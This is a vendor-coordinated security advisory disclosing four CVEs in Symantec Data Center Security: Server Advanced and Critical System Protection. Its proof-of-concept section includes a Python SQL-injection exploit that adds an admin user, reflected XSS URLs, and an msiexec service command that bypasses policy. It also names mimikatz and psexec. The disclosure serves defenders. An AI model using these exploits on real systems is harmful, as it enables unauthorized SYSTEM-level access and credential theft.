Symantec SDCS:SA / SCSP XSS / Bypass / SQL Injection / Disclosure

`SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
products: Symantec Data Center Security: Server Advanced (SDCS:SA)  
Symantec Critical System Protection (SCSP)  
vulnerable version: see: Vulnerable / tested versions  
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all  
vulnerabilities were fixed, but mitigations exist  
impact: Critical  
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226  
homepage: http://www.symantec.com  
found: 2014-09-19  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)  
extends the Data Center Security: Server solution beyond agentless threat  
protections by incorporating technologies previous known as Critical System  
Protection. Data Center Security: Server Advanced provides granular, policy-  
based controls with a low impact in-guest agent to monitor and protect numerous  
physical and virtual server environments. Through a combination of technologies  
including application-centric controls including protected white listing,  
sandboxing using least privilege access controls, host-based intrusion detection  
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),  
organizations can proactively safeguard their heterogeneous server environments  
and the information they contain from zero-day and targeted attacks, and fulfill  
their compliance mandates across critical systems. Click here for more info"  
  
Source:  
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products  
  
  
Business recommendation:  
------------------------  
Attackers are able to completely compromise the SDCS:SA Server as they can gain  
access at the system and database level. Furthermore attackers can manage all  
clients and their policies.  
  
SDCS:SA Server can be used as an entry point into the target infrastructure  
(lateral movement, privilege escalation).  
  
Furthermore the SDCS:SA Client protections can be bypassed in several ways.  
  
It is highly recommended by SEC Consult not to use this software until a  
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been  
performed by security professionals and all identified issues have been  
resolved.  
  
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)  
Due to insufficient input validation, the application allows the injection  
of direct SQL commands. By exploiting the vulnerability, an attacker gains  
access (read/write) to all records stored in the database as arbitrary SQL  
statements can be executed.  
  
Furthermore the application design enables an attacker to gain code execution  
as SYSTEM (highest privilege Windows user) on the server by exploiting this  
vulnerability.  
  
No prior authentication is needed to exploit this vulnerability.  
  
Affected script:  
https://<host>:4443/sis-ui/authenticate  
  
  
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)  
The applications suffers from a reflected cross-site scripting vulnerability,  
which allows an attacker to steal other users' sessions, to impersonate other  
users and to gain unauthorized access to the admin interface.  
  
Affected scripts:  
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp  
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp  
  
  
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)  
A script discloses internal information about the application on the server  
without prior authentication. This information includes file paths on the  
webserver, version information (OS, Java) and is accessible without prior  
authentication.  
  
Affected script:  
https://<host>:8081/webui/admin/environment.jsp  
  
  
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)  
(CVE-2014-9226)  
Several bypasses were discovered. These require Windows Administrator  
permissions. This requirement is usually met in SDCS:SA deployments.  
  
Note: SEC Consult did not check whether the mitigations provided by Symantec do  
in fact sufficiently mitigate these vulnerabilities!  
  
- Persistent code execution via Windows Services  
The default Symantec policy rules can be bypassed in order to get persistent  
arbitrary code execution.  
  
- Remote code execution via RPC  
The default Symantec policy rules can be bypassed in order to get persistent  
arbitrary code execution. In addition to that "psexec-style" remote code  
execution via SMB is possible as well.  
  
- Policy bypass: Extraction of Windows passwords/hashes  
The default Symantec policy rules do not prevent attackers from extracting  
the Windows passwords/password hashes from the System.  
  
- Privilege elevation via Windows Installer (msiexec.exe)  
The restrictions imposed by the default policies can be bypassed entirely by  
exploiting incorrect assumptions made in the policy regarding the Windows  
Installer (msiexec.exe).  
  
- Privilege elevation/code execution via Windows Management Instrumentation  
(.mof files)  
The restrictions imposed by default policies can be bypassed partially by  
exploiting incorrect assumptions made in the policy regarding the Windows  
Management Instrumentation. The policy does not take intended OS functionality  
to execute code into account.  
  
Proof of concept:  
-----------------  
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)  
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is  
vulnerable to SQL injection. By sending a specially crafted HTTP request,  
arbitrary SQL statements can be executed.  
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with  
admin privileges (username: secconsult, password: PASSWORD123!) were executed.  
These statements are:  
  
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,  
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,  
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',  
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',  
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',  
'2014-09-12 07:13:23', '1', '0', '0',  
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');  
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);  
  
The code used to exploit the SQL injection vulnerability is listed below:  
  
import httplib  
def send_request(host,data):  
params = data  
headers = {"AppFire-Format-Version": "1.0",  
"AppFire-Charset": "UTF-16LE",  
"Content-Type":"application/x-appfire",  
"User-Agent":"Java/1.7.0_45",  
}  
conn = httplib.HTTPSConnection(host)  
conn.request("POST", "/sis-ui/authenticate", params, headers)  
response = conn.getresponse()  
data=response.read()  
conn.close()   
return response,data  
  
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"  
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,  
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,  
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)  
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',  
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12  
07:13:23', '1', '0', '0',  
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');  
-- '' " # add user to USR table  
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,  
ROLERID) VALUES (1504, 1); -- " # add user to admin group  
data+="\r\nan=Symantec Data Center Security Server  
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"  
data = data.encode('utf-16le')  
  
eof_flag="\nEOF_FLAG\n"  
header = header %(len(data))  
payload=header+data+eof_flag  
  
response,data = send_request("<host>:4443",payload)  
  
print data.decode('utf-16le')  
print response.status  
  
  
As the application users act as Tomcat administrators, an attacker can login  
into the Tomcat manager as well. The Tomcat manager is available by default  
via TCP port 8081 HTTPS.  
The Tomcat Web Application Manager can be used to deploy new .war-files  
containing attacker-controlled Java code. This allows an attacker to execute  
arbitrary commands on the operating system with the permissions/user of the  
"Symantec Data Center Security Server Manager" service (SISManager) which are  
SYSTEM.  
  
  
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)  
At least the following URLs are vulnerable to XSS:  
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>  
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>  
  
  
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)  
The following URLs discloses internal information:  
https://example.com:8081/webui/admin/environment.jsp  
  
  
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)  
(CVE-2014-9226)  
- Persistent code execution via Windows Services  
Windows Service binaries can have file extensions other than ".exe". This  
allows an attacker to execute arbitrary files and enables automatic execution  
of malicious code at OS boot.  
  
- Remote code execution via RPC  
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can  
be modified to write files not ending with ".exe" on the target system.  
  
- Policy bypass: Extraction of Windows passwords/hashes  
The tool "mimikatz" can be used to extract Windows credentials.  
  
- Privilege elevation via Windows Installer (msiexec.exe)  
msiexec.exe is trusted "safe privileges" when started as a service (usually  
"Windows Installer" parameter "/V"). This can be abused by creating a service  
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid  
.msi file. Upon service start the .msi file is executed with "safe privileges"  
privileges and not subject to any SDCS:SA Client checks.  
  
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i  
c:\temp\evil_msi" type= own start= auto error= ignore  
net start evil_service  
  
- Privilege elevation/code execution via Windows Management Instrumentation  
(.mof files)  
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"  
are automatically compiled/executed. These trigger arbitrary code execution.  
The code is executed with "def_winsvcs_ps" permissions.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in Symantec Data Center  
Security: Server Advanced version 6.0, which was the most recent version at  
the time of discovery.  
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as  
well. See the vendor information in the Solution section.  
  
  
  
Vendor contact timeline:  
------------------------  
2014-10-20: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-10-20: Vendor acknowledges receipt of advisory.  
2014-11-18: Requesting status update.  
2014-11-18: Vendor responds and informs about an advisory in December,  
version containing fixes in February.  
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,  
target release date mid-January.  
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).  
2015-01-17: Vendor releases fixes for SCSP.  
2015-01-19: Vendor releases advisory and mitigations for SCSP/  
2015-01-22: SEC Consult releases coordinated security advisory.  
  
  
  
Solution:  
---------  
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).  
  
Not all vulnerabilities are fixed by this update! However, Symantec has  
provided mitigations for these issues:  
  
More information can be found at:  
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00  
  
http://www.symantec.com/business/support/index?page=content&id=TECH227679  
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071  
  
  
Workaround:  
-----------  
See solution.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested to work with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2015  
  
`